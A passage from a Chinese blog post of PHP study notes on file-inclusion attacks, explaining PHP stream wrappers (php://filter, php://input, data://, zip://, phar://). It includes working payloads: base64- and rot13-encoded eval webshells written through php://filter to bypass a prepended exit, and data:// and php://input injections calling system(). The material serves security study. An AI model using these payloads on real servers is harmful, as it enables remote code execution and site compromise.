<h6 id="3）加密过滤器"><a href="#3）加密过滤器" class="headerlink" title="3）加密过滤器"></a><strong>3）加密过滤器</strong></h6><p><code>mcrypt.*/mdecrypt</code>.*：使用MCrypt扩展进行加密&#x2F;解密</p>
<h6 id="4）压缩过滤器"><a href="#4）压缩过滤器" class="headerlink" title="4）压缩过滤器"></a><strong>4）压缩过滤器</strong></h6><p><code>zlib.deflate</code>：压缩</p>
<p><code>zlib.inflate</code>：解压</p>
<h5 id="绕过死亡exit"><a href="#绕过死亡exit" class="headerlink" title="绕过死亡exit"></a>绕过死亡exit</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$content</span> = <span class="hljs-string">&#x27;&lt;?php exit; ?&gt;&#x27;</span>;<br><span class="hljs-variable">$content</span> .= <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;txt&#x27;</span>];<br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;filename&#x27;</span>], <span class="hljs-variable">$content</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p> 由于开头一直有一个exit的存在，会使得我们的一句话木马并不会被执行（这个过程在实战中十分常见，通常出现在缓存、配置文件等等地方，不允许用户直接访问的文件，都会被加上if(!defined(xxx))exit;之类的限制）</p>
<p>file_put_contents函数中，第一个参数是可以使用php伪协议的，所以这里就可以用php:&#x2F;&#x2F;filter伪协议以及各种过滤器</p>
<h6 id="base64绕过"><a href="#base64绕过" class="headerlink" title="base64绕过"></a><strong>base64绕过</strong></h6><p>因为$content开头的死亡代码中包含<code>&lt;?···?&gt;</code>这些字符，而这些字符并不在base64的字符中，所以对其进行base64解码时会忽略掉这些字符，所以最终被解码的字符只有”phpexit”和传入的其他字符</p>
<p>“phpexit”一共只有7字符，但是base64算法解码时是4个byte一组，所以需要增加1个a一共8个字符，这样”phpexita”就能被正常解码，而后面我们传入的webshell的base64内容也被正常解码，结果就是<?php exit;?></p>
<p>然后就可以通过对一句话木马进行base64编码并利用filter伪协议来构造payload</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/write=convert.base64-decode/</span>resource=文件名&amp;txt=a PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==  <br></code></pre></td></tr></table></figure>

<p>一定要在开头加上a来凑满8个字符满足base64解码要求</p>
<h6 id="string-rot13绕过"><a href="#string-rot13绕过" class="headerlink" title="string.rot13绕过"></a><strong>string.rot13绕过</strong></h6><p>string.rot13是常用的字符串过滤器，作用是右移13位也就是rot13编码</p>
<p><code>&lt;?php exit; ?&gt;</code>在经过rot13编码后会变成<code>&lt;?cuc rkvg; ?&gt;</code></p>
<p>在配置中， short_open_tag  ：off的时候，php不认识这个字符串，就不会执行命令</p>
<p>写入的一句话木马要求是经过rot13编码后恢复原状</p>
<p>构造payload：</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ruby"><span class="hljs-symbol">php:</span>/<span class="hljs-regexp">/filter/write</span>=string.rot13/resource=kirito.php&amp;txt=&lt;<span class="hljs-string">?c</span>uc riny(<span class="hljs-variable">$_CBFG</span>[<span class="hljs-string">&#x27;pzq&#x27;</span>]);<span class="hljs-string">?&gt;</span><br></code></pre></td></tr></table></figure>



<h6 id="string-strip-tags与base64共同使用"><a href="#string-strip-tags与base64共同使用" class="headerlink" title="string.strip_tags与base64共同使用"></a><strong>string.strip_tags与base64共同使用</strong></h6><p>string.strip_tags也是字符串过滤器，是用来处理掉读入的所有标签</p>
<p>例如</p>
<p><code>&lt;?php exit;?&gt;</code>Test经过string.strip_tags以后只要Test</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/JL20050725/article/details/150420908">https://blog.csdn.net/JL20050725/article/details/150420908</a></p>
<h4 id="php-input"><a href="#php-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h4><p>用于执行php代码，读取HTTP请求体（如POST请求）</p>
<p>可以访问请求的原始数据，用于执行php代码，将POST数据作为PHP代码执行，可以将参数改为file&#x3D;php:&#x2F;&#x2F;input,然后使用bp抓包后直接传参<?php system('命令');?>即将POST参数作为php代码执行</p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005856602.png" srcset="/img/loading.gif" lazyload alt="image-20260124005856602"></p>
<p>例如：最后一行传参（但这个好像传的也有问题，要把请求头改为POST）</p>
<p>利用条件：</p>
<ul>
<li>allow_url_fopen ：off&#x2F;on</li>
<li>allow_url_include：off&#x2F;on</li>
</ul>
<h4 id="file"><a href="#file" class="headerlink" title="file:&#x2F;&#x2F;"></a>file:&#x2F;&#x2F;</h4><p> 用于访问本地文件系统， 在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响  </p>
<p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005902759.png" srcset="/img/loading.gif" lazyload alt="image-20260124005902759"></p>
<p>格式：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp"><span class="hljs-keyword">file</span>:<span class="hljs-comment">// [文件的绝对路径和文件名] </span><br></code></pre></td></tr></table></figure>



<h4 id="data"><a href="#data" class="headerlink" title="data:&#x2F;&#x2F;"></a>data:&#x2F;&#x2F;</h4><p>它允许将原始数据嵌入到 URL 中。</p>
<p> 利用data:&#x2F;&#x2F; 伪协议可以直接达到执行php代码的效果  </p>
<p>文件包含漏洞，可以用这个伪协议，将恶意 PHP 代码作为数据嵌入，并让服务器解释执行</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">?file=data://text/plain,</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;ls&#x27;</span>); <span class="hljs-meta">?&gt;</span></span><br></code></pre></td></tr></table></figure>

<p><strong>利用条件</strong>：</p>
<ul>
<li>allow_url_include：on</li>
<li>allow_url_fopen ：on</li>
</ul>
<h4 id="ZIP-协议"><a href="#ZIP-协议" class="headerlink" title="ZIP:&#x2F;&#x2F;协议"></a>ZIP:&#x2F;&#x2F;协议</h4><p> 可以访问压缩包里面的文件</p>
<p>zip:&#x2F;&#x2F;中只能传入绝对路径  </p>
<p> 要用#分割压缩包和压缩包里的内容，并且#要用url编码成%23  </p>
<p>格式：zip:&#x2F;&#x2F;[压缩包绝对路径]#[压缩包内文件]</p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stata">?<span class="hljs-keyword">file</span>=<span class="hljs-keyword">zip</span>:<span class="hljs-comment">//D:\:\1.zip%23phpinfo.txt</span><br></code></pre></td></tr></table></figure>

<p>%23是#的URL编码</p>
<p><strong>利用条件</strong>：</p>
<ul>
<li>allow_url_fopen ：off&#x2F;on</li>
<li>allow_url_include：off&#x2F;on</li>
</ul>
<h4 id="phar伪协议"><a href="#phar伪协议" class="headerlink" title="phar伪协议"></a>phar伪协议</h4><p> 就是php解压缩包的一个函数，不管后缀是什么，都会当做压缩包来解压</p>
<p>格式：</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp">?<span class="hljs-keyword">file</span>=phar:<span class="hljs-comment">//压缩包/内部文件</span><br></code></pre></td></tr></table></figure>

<p>步骤</p>
<p>1)写一个一句话木马shell.php</p>
<p>2)然后用zip协议解压缩为shell.zip</p>
<p>3)然后将后缀改为png等其他格式  </p>
<h4 id="伪协议利用条件"><a href="#伪协议利用条件" class="headerlink" title="伪协议利用条件"></a>伪协议利用条件</h4><p><img src="/2026/01/24/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/image-20260124005910963.png" srcset="/img/loading.gif" lazyload alt="image-20260124005910963"></p>
<h6 id><a href="#" class="headerlink" title></a></h6><h3 id="-1"><a href="#-1" class="headerlink" title></a></h3>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/PHP%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" class="category-chain-item">PHP学习笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" class="print-no-link">#文件包含</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>文件包含</div>
      <div>https://colourful228.github.io/2026/01/24/文件包含/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Colourful</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年1月24日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2026年1月31日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/01/24/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" title="文件上传">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">文件上传</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/01/22/XXE/" title="XXE">
                        <span class="hidden-mobile">XXE</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/twikoo/1.6.8/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"https://imagegoo-twikoo.hf.space","region":"ap-shanghai","path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              Fluid.utils.listenDOMLoaded(function() {
                var imgSelector = '#twikoo .tk-content img:not(.tk-owo-emotion)';
                Fluid.plugins.imageCaption(imgSelector);
                Fluid.plugins.fancyBox(imgSelector);
              });
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
    <div>
        <span id="timeDate">正在载入天数...</span>
        <span id="times">载入时分秒...</span>
        <script>
          var now = new Date();
          function createtime(){
            var grt= new Date("01/09/2026 00:00:00");
            now.setTime(now.getTime()+250);
            days = (now - grt ) / 1000 / 60 / 60 / 24;
            dnum = Math.floor(days);
            hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
            hnum = Math.floor(hours);
            if(String(hnum).length ==1 ){
              hnum = "0" + hnum;
            }
            minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
            mnum = Math.floor(minutes);
            if(String(mnum).length ==1 ){
              mnum = "0" + mnum;
            }
            seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
            snum = Math.round(seconds);
            if(String(snum).length ==1 ){
              snum = "0" + snum;
            }
            document.getElementById("timeDate").innerHTML = "🚀已持续航行&nbsp"+dnum+"&nbsp天";
            document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
          }
          setInterval("createtime()",250);
        </script>
    </div>



    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  var relativeDate = function() {
    var updatedTime = document.getElementById('updated-time');
    if (updatedTime) {
      var text = updatedTime.textContent;
      var reg = /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:Z|[+-]\d{2}:\d{2})/;
      var matchs = text.match(reg);
      if (matchs) {
        var relativeTime = moment(matchs[0]).fromNow();
        updatedTime.textContent = text.replace(reg, relativeTime);
      }
      updatedTime.style.display = '';
    }
  };
  Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/moment.min.js', function() {
    if (!'zh-cn'.startsWith('en')) {
      Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/locale/zh-cn.min.js', function() {
        relativeDate();
      });
    } else {
      relativeDate();
    }
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
